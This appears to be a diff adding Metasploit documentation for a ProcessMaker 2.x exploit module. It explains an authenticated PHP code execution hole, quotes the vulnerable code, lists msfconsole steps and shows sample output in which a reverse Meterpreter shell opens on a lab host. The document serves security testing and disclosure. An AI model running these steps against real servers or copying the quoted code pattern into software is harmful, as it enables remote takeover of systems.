diff --git a/documentation/modules/exploit/multi/http/processmaker_exec.md b/documentation/modules/exploit/multi/http/processmaker_exec.md new file mode 100644 index 0000000000..e0f1f75a2b --- /dev/null +++ b/documentation/modules/exploit/multi/http/processmaker_exec.md @@ -0,0 +1,93 @@ +## Description + + This module exploits a PHP code execution vulnerability in the default *neoclassic* skin for [ProcessMaker Open Source](http://www.processmaker.com/) which allows any authenticated user to execute PHP code. The vulnerable skin is installed by default in version 2.x prior to 2.5.2 and cannot be removed via the web interface. + + +## Vulnerable Application + + ProcessMaker is an open source, workflow management software suite, which includes tools to automate your workflow, design forms, create documents, assign roles and users, create routing rules, and map an individual process quickly and easily. It's relatively lightweight and doesn't require any kind of installation on the client computer. + + This module has been tested successfully on ProcessMaker Open Source versions 2.5.1, 2.5.0, 2.0.23 on Windows XP SP3; and version 2.0.45 on Debian Linux. + + The vulnerability was patched in version 2.5.2. + + Source and Installers: + + * [ProcessMaker Open Source 2.0.x](https://sourceforge.net/projects/processmaker/files/ProcessMaker/2.0/) + * [ProcessMaker Open Source 2.5.x](https://sourceforge.net/projects/processmaker/files/ProcessMaker/2.5/) + + +## Technical Details + + Several files within the default *neoclassic* skin allow authenticated users to supply a PHP function in the `action` parameter and arguments for the aforementioned function in the `params` parameter. The application calls the supplied function name with the supplied parameters resulting in execution of arbitrary user supplied PHP code. + + The relevant source code for the affected files is shown below. + + **appFolder/appFolderAjax.php** + + ```php + if (($_REQUEST['action']) != 'rename') { + $functionName = $_REQUEST ['action']; + $functionParams = isset ($_REQUEST ['params']) ? $_REQUEST ['params'] : array (); + $functionName ($functionParams); + ``` + + **cases/casesStartPage_Ajax.php** + + ```php + $functionName = $_REQUEST['action']; + $functionParams = isset( $_REQUEST['params'] ) ? $_REQUEST['params'] : array (); + $functionName( $functionParams ); + ``` + + **cases/cases_SchedulerGetPlugins.php** + + ```php + $functionName = $_REQUEST['action']; + $functionParams = isset( $_REQUEST['params'] ) ? $_REQUEST['params'] : array (); + $functionName( $functionParams ); + ``` + + +## Verification Steps + + 1. Start `msfconsole` + 2. Do: `use exploit/multi/http/processmaker_exec` + 3. Do: `set username [USER]` + 4. Do: `set password [PASS]` + 5. Do: `set rhost [IP]` + 6. Do: `run` + 7. You should get a session + + +## Sample Output + + ``` + msf exploit(processmaker_exec) > check + [*] 192.168.172.135:80 - Authenticating as user 'admin' + [+] 192.168.172.135:80 - Authenticated as user 'admin' + [*] 192.168.172.135:80 - Sending check + [+] The target is vulnerable. + + msf exploit(processmaker_exec) > exploit + [*] Started reverse handler on 192.168.172.1:4444 + [*] 192.168.172.135:80 - Authenticating as user 'admin' + [+] 192.168.172.135:80 - Authenticated as user 'admin' + [*] 192.168.172.135:80 - Sending payload 'V7hd5EevO9Ho.php' (1795 bytes) + [+] 192.168.172.135:80 - Payload sent successfully + [*] 192.168.172.135:80 - Retrieving file 'V7hd5EevO9Ho.php' + [*] Sending stage (39195 bytes) to 192.168.172.135 + [*] Meterpreter session 3 opened (192.168.172.1:4444 -> 192.168.172.135:32789) at 2013-10-29 09:53:08 -0500 + [+] Deleted V7hd5EevO9Ho.php + + ^C[-] Exploit failed: Interrupt + + meterpreter > getuid + Server username: www-data (33) + meterpreter > sysinfo + Computer : processmaker + OS : Linux processmaker 3.2.0-4-amd64 #1 SMP Debian 3.2.51-1 x86_64 + Meterpreter : php/php + meterpreter > exit + ``` +